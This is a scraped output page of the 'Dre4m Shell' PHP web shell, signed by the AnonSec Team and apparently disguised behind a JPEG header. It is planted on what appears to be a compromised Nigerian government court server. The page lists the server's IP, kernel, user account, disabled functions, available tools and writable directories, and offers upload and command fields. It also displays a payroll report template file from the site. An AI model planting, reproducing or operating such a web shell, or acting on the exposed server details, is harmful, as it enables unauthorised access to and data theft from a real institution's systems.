ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.117.185.166
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/150d4d5d8bdcbc91f2819a4389307828ea55ee0e.php
<!--NOTE: 0- false, 1-true-
 include('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'payrol Report', 'title2'=>'date', 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>0, 'hideLogos'=>0, 'hideAddress'=>0])
-->
   <?php
	$oldRecord = DB::table('report_head_logo')->where('id', 1)->first();
   ?>
	
<br />
 <div class="row">
    <?php if($hideLogos == 0): ?>
    <div align="center" class="col-xs-3">
	<img width ="120" src="<?php echo e(($oldRecord) ? asset('companyLogos/'.$oldRecord->company_logo) : ''); ?>" class="img-responsive">
    </div>
    <?php endif; ?>
    <span class="<?php echo ($hideLogos == 0) ? 'col-xs-6' : 'col-xs-12'; ?>">
    	<div align="center" style="color:#06c;">
    		<?php if($companyName == ('defaultName')): ?>
    		    <h4 class="text-success"> <b> <?php echo ($oldRecord) ? strtoupper($oldRecord->company_name) : ''; ?> </b> </h4> 
    		<?php else: ?>
    		    <h4 class="text-success"> <b> <?php echo strtoupper($companyName); ?> </b> </h4>
    		<?php endif; ?>
    		
    		<?php if($hideAddress == 0): ?>
    		    <?php if($companyAddress == ('defaultAddress')): ?>
    		         <h5 class="text-success"> <b> <?php echo ($oldRecord) ? strtoupper($oldRecord->address) : ''; ?> </b> </h5> 
    		    <?php else: ?>
    		         <h5 class="text-success"> <b> <?php echo strtoupper($companyAddress); ?> </b> </h5>
    		    <?php endif; ?> 
    		<?php endif; ?>
    		
    		<?php if($showOnlyTitle1 == 1): ?>
    		    <h5 class="text-success"> <strong><?php echo ($title1 == 'Generated' or $title1 == 'date') ? 'Generated: ' . date('d-M-Y') : strtoupper($title1); ?></strong> </h5>
    		<?php endif; ?>
    		
    		<?php if($showOnlyTitle2 == 1): ?>
    		    <h6 class="text-success"> <?php echo ($title2 == 'Generated' or $title2 == 'date') ? 'Generated: ' . date('d-M-Y') : strtoupper($title2); ?> </h6>
    		<?php endif; ?>
	</div>
    </span>
    <?php if($hideLogos == 0): ?>
    <div align="center" class="col-xs-3">
    	<img width="120" src="<?php echo e(($oldRecord) ? asset('companyLogos/'.$oldRecord->report_logo) : ''); ?>" width ="120" class="img-responsive">
    </div>
    <?php endif; ?>
</div>



<?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/layouts/allReportHeader.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team